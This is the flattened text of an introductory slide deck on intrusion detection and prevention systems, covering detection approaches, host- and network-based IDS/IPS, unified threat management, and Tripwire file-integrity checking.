Agenda • • • • • • • • • Introduction Intrusion & current Threat scenario Introduction to IDS/IPS IDS/IPS Detection Techniques Main Types of IDS/IPS Introduction of UTM Intrusion Detection with Tripwire Summary References Q&A What is Intrusion? • A set of actions aimed at compromising the security goals (confidentiality, integrity, availability of a computing/networking resource) Why need to protect? Current Threat Scenario Internal External Malicious intent Blended Threats Phishing Identity theft Malware Data Corruption Botnets Information Leak USER Why need to protect? (Cont..) • There are two types of threats – External threats – Internal threats Why need to protect? (Cont..) • External Threats (Targeting the Individuals) Who are the attackers? • It is no longer individuals • Attacks executed as joint ventures among professional programmers with access to greater pooled resources • Consortiums dedicated to the creation and distribution of malicious software intended to steal money from individuals Why need to protect? (Cont..) What are the motives? • To gain attention • Financial theft (main driver of malware authors) • Identity theft Who are the victims? • Small corporations • Key Individuals • Basically any one Why need to protect? (Cont..) • Internal Threats – Insiders acting as initiators themselves or as conduits for other attacks – User Ignorance – Malicious Intent - Intentional security breaches – Disgruntled employees Why need to protect? (Cont..) • Why such Insider threats can lead to more damage? – Employees carry valid authorization and privacy of the organization’s information – Dishonest insiders’ can exploit an organization’s vulnerabilities To commit identity fraud and expose confidential information For personal gain or organized crime – Insider attacks can be more difficult to detect than external penetration attempts How to protect? There are two ways of protection mechanisms • Intrusion detection (IDS) • Intrusion prevention (IPS) Introduction to IDS • Intrusion detection system (IDS) – A system that automatically identifying and responding to intrusion activities Introduction to IPS • Intrusion prevention system (IPS) – A system that has an ambition to both detect intrusions and manage responsive actions Introduction to IPS (Cont..) – Technically, an IPS contains an IDS and combines it with preventive measures – IPS use IDS algorithms to monitor and drop/allow traffic based on expert analysis – The ”firewall” part of an IPS can prevent malicious traffic from entering/exiting the network Basic assumptions for IDS/IPS • Basic assumptions: – System activities are observable – Normal and intrusive activities have distinct evidence – The goal of an IDS/IPS is to detect the difference How IDS/IPS Works? • The IPS monitors the network much like the IDS but when an event occurs, it takes action based on prescribed rules • Security administrator can define such rules so the systems respond in the way they would How IDS/IPS Works? (Cont..) How IDS/IPS Works? (Cont..) • IPS can be achieved through three main approaches – Building systems with no vulnerability – Taking perfect remediation steps to uncover vulnerabilities and patch them – Detecting the exploit attempts and blocking them before serious damage is done How IDS/IPS Protects? • IPS technologies can respond to a detected threat by attempting to prevent it from succeeding. They use several response techniques, which can be divided into the following groups – The IPS stops the attack itself – The IPS changes the security environment – The IPS changes the attack’s content How IDS/IPS Protects?(Cont..) • The IPS stops the attack itself – Terminate the network connection or user session that is being used for the attack – Block access to the target from the offending user account, IP address, or other attacker attribute. Block all access to the targeted host, service, application, or other resource How IDS/IPS Protects?(Cont..) • The IPS changes the security environment – The IPS could change the configuration of other security controls to disrupt an attack – Common examples are reconfiguring a network device such as firewall, router, and switch to block access from the attacker How IDS/IPS Protects?(Cont..) • The IPS changes the attack’s content – IPS technologies can remove or replace malicious portions of an attack to make it benign An example is an IPS that acts as a proxy and normalizes incoming requests and permitting the cleaned data to reach its recipient How IDS/IPS detects? There are different types of approaches is used in the IPS to secure the network – Signature-Based – Anomaly-Based – Policy-Based – Protocol-Analysis-Based These approaches are also used to classify IDS/IPS systems and the classification is called IDS/IPS by Detection Model How IDS/IPS detects? (Cont...) • Signature-Based IPS – It is the commonly used by many IPS solutions – Signatures are added to the devices that identify a pattern that the most common attacks present – That’s why it is also known as pattern matching – These signatures can be added, tuned, and updated to deal with the new attacks How IDS/IPS detects? (Cont...) • Policy-based IPS – It is more concerned with enforcing the security policy of the organization – Alarms are triggered if activities are detected that violate the security policy coded by the organization – With this type approaches security policy is written into the IPS device How IDS/IPS detects? (Cont...) • Anomaly-Based approach IPS – It is also called as profile-based – It attempts to discover activity that deviates from what an engineer defines as normal activity – Anomaly-based approach can be statistical anomaly detection and non-statistical anomaly detection – The statistical approach is about the traffic patterns on the network itself, and the non-statistical method is about information coded by the solution vendor How IDS/IPS detects?(Cont...) • Protocol-analysis-based IPS – It is similar to signature based approach – Most signatures examines common settings, but the protocol-analysis-based approach can do much deeper packet inspection and is more flexible in finding some types of attacks IDS/IPS Detection Techniques • Stateless – Most of the network-based IDS currently available are stateless. They typically monitor and analyze all traffic in real-time on a packet-by-packet basis against a database of known patters for a match • State full – A State-full IDS can be defined as a packet filtering and analysis mechanism which makes decision on current packet AND information from previous packets IDS/IPS Detection Techniques (Cont..) • Deep Packet Inspection – Deep Packet Inspection mostly used in NIDS to look within the application payload of a packet or traffic stream and make decisions on the significance of that data based on the content of that data (analyze the packet header fields – DPI technology can be effective against buffer overflow attacks, denial of service (DoS) attacks, sophisticated intrusions, and a small percentage of worms that fit within a single packet Main Types of IDS/IPS • Scope based IPS protection (or by location) – Host-Based Intrusion Prevention System (HIPS) – Network-Based Intrusion Prevention System (NIPS) Host Based IDS/IPS • Host-based IPS is a software program that resides on individual systems such as servers, workstations or notebooks • Traffic flowing into or out of that particular system is inspected and the behaviour of the applications and operating system may be examined for indications of an attack • These host system-specific programs or agents may protect just the operating system, or applications running on the host as well as web servers Host Based IDS/IPS (Cont..) • When an attack is detected, the Host IPS software either blocks the attack at the network Interface level, or issues commands to the application or operating system to stop the behaviour initiated by the attack • It binds closely with the operating system kernel and services, monitoring and intercepting system calls to the kernel or APIs in order to prevent attacks as well as log them • One potential disadvantage with this approach is that, given the necessarily tight integration with the host operating system, future operating system upgrades could cause problems Benefits of Host IDS/IPS • Protects mobile systems from attack when attached outside the protected network • Prevents internal attack or misuse on devices located on the same network segment, Network IPS only provides protection for data moving between different segments • Protects against encrypted attacks where the encrypted data stream terminates at the system being protected Network Based IDS/IPS • Network-Based Intrusion Prevention System (NIPS) is software or dedicated hardware system that connects directly to a network segment and protects all of the systems attached to the same or downstream network segments Network Based IDS/IPS (Cont..) • NIPS has at least two network interfaces, one designated as internal and one as external • As packets appear at the either interface they are passed to the detection engine, at which point the IPS device functions much as any IDS would in determining whether or not the packet being examined poses a threat Benefits of Network IDS/IPS • Easy deployment as a single sensor can protect hundreds on systems • A single control point for traffic can protect thousands of systems located down stream of the device (no matter what the operating system or application) • Protects against network DoS, DDos attacks and SYN flood etc Introduction of UTM • Unified threat management (UTM) refers to a comprehensive security product that includes protection against multiple threats • A UTM product typically includes a firewall, antivirus software, content filtering and a spam filter in a single integrated package Advantages of UTM • Simplicity • Streamlined installation and use • Ability to update all the security functions or programs concurrently • Eliminates the need for systems administrators to maintain multiple security programs over time Disadvantages of UTM • UTM introduces a single point of failure it lead for all the network security elements • There is always a possibility of performance constraint as there are limitations in hardware processing capabilities to handle so many applications/users simultaneously • There is always challenge from cloud computing initiatives and UTM’s might have to be deployed in a virtual manner Intrusion Detection with Tripwire • Tripwire compares files and directories against a baseline database of file locations, dates modified, and other data • It generates the baseline by taking a snapshot of specified files and directories in a known secure state • After creating the baseline database, Tripwire compares the current system to the baseline and reports any modifications, additions, or deletions Tripwire Architecture Tripwire Commands • twinstall.sh - Run the configuration script (/etc/tripwire/twinstall.sh) • tripwire –init - The /var/lib/tripwire directory contains the Tripwire database of your system's files (*.twd) and a report directory where Tripwire reports are stored • tripwire –check - To run an integrity check Tripwire compares the current, actual file system objects with their properties as recorded in its database. Violations are printed to standard Tripwire Sample Report Summary • Due to the dynamic nature of network intrusion threats, deploying a mixture of both technologies (HIPS & NIPS) will provide the greatest level of protection for critical assets References • http://www.symantec.com/connect/articles/evolution-intrusiondetection-systems • http://searchmidmarketsecurity.techtarget.com/sDefinition/0,,sid 198_gci295031,00.html • http://searchmidmarketsecurity.techtarget.com/sDefinition/0,,sid 198_gci295031,00.html • http://www.hig.no/index.php/content/download/8588/118736/fi le/Topic_1.ppt • http://searchsecurity.techtarget.com/tip/0,289483,sid14_gci1092 691,00.html • http://idstutorial.com/anomaly-detection.php Questions?